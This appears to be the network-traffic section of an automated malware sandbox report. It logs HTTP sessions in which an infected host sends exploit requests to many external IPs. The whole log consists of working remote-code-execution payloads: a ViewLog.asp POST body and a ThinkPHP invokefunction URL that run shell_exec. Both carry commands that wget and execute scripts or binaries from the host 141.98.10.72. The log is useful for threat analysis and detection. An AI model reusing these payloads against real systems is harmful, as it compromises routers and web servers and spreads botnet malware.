                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            13192.168.2.235664285.66.48.1938080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.007531881 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            14192.168.2.234141031.136.155.2308080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.007752895 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:44.709553003 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:46.117311001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:48.932920933 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:27:54.564255953 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:05.826529980 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:28.863339901 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:29:13.913063049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            15192.168.2.235875094.123.89.1758080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.027692080 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            16192.168.2.2338972112.124.185.18380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:44.347059965 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:44.700620890 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:29:04 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            17192.168.2.235863695.101.71.20580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:45.906429052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:46.116919041 CET479INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 257
                                                            Expires: Wed, 14 Feb 2024 08:27:46 GMT
                                                            Date: Wed, 14 Feb 2024 08:27:46 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 63 66 63 31 34 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 32 36 36 26 23 34 36 3b 65 30 66 66 31 39 33 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;1cfc1402&#46;1707899266&#46;e0ff193</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            18192.168.2.234948095.90.14.2280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:45.916354895 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:46.137978077 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            19192.168.2.233729295.213.203.3480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:45.924535036 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:46.153729916 CET323INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:46 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            20192.168.2.233679688.218.206.3380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:46.135641098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:56.353455067 CET30INData Raw: 3f 3a 4b 27 7d 52 21 3a 7a 7a 3b 27 22 5f 72 5d 0d 0a
                                                            Data Ascii: ?:K'}R!:zz;'"_r]


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            21192.168.2.2355736112.78.125.8580
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:52.686553001 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:52.987200975 CET307INHTTP/1.1 400 Bad Request
                                                            Server: nginx
                                                            Date: Wed, 14 Feb 2024 08:27:52 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 150
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            22192.168.2.2356268112.147.179.18280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:52.686623096 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            23192.168.2.2344164112.74.1.22280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:52.719402075 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:53.063405037 CET441INHTTP/1.1 400 Bad Request
                                                            Server: AliyunOSS
                                                            Date: Wed, 14 Feb 2024 08:27:52 GMT
                                                            Content-Type: text/xml
                                                            Connection: close
                                                            x-oss-request-id: 65CC7988E144DC3038FC14EA
                                                            Content-Length: 249
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 45 72 72 6f 72 3e 0a 20 20 3c 43 6f 64 65 3e 42 61 64 52 65 71 75 65 73 74 3c 2f 43 6f 64 65 3e 0a 20 20 3c 4d 65 73 73 61 67 65 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 2f 4d 65 73 73 61 67 65 3e 0a 20 20 3c 52 65 71 75 65 73 74 49 64 3e 36 35 43 43 37 39 38 38 45 31 34 34 44 43 33 30 33 38 46 43 31 34 45 41 3c 2f 52 65 71 75 65 73 74 49 64 3e 0a 20 20 3c 48 6f 73 74 49 64 3e 6c 6f 63 61 6c 68 6f 73 74 3c 2f 48 6f 73 74 49 64 3e 0a 3c 2f 45 72 72 6f 72 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="UTF-8"?><Error> <Code>BadRequest</Code> <Message>Your browser sent a request that this server could not understand.</Message> <RequestId>65CC7988E144DC3038FC14EA</RequestId> <HostId>localhost</HostId></Error>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            24192.168.2.2352692112.167.247.480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:52.974805117 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:53.258560896 CET512INHTTP/1.0 400 Bad Request
                                                            Content-Type: text/html
                                                            Content-Length: 345
                                                            Connection: close
                                                            Date: Wed, 14 Feb 2024 17:24:46 GMT
                                                            Server: lighttpd/1.4.55
                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>400 Bad Request</title> </head> <body> <h1>400 Bad Request</h1> </body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            25192.168.2.235531088.102.200.12080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.192869902 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:53.411664009 CET511INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:27:53 GMT
                                                            Server: Apache/2.4.56 (Debian)
                                                            Content-Length: 317
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 6d 61 72 73 6f 76 69 63 65 2e 67 6d 6d 75 6c 74 69 6d 65 64 69 61 2e 63 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.56 (Debian) Server at marsovice.gmmultimedia.cz Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            26192.168.2.233968288.84.193.10380
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:27:53.206198931 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:27:53.438807011 CET335INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.6.2
                                                            Date: Wed, 14 Feb 2024 08:27:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 172
                                                            Connection: close
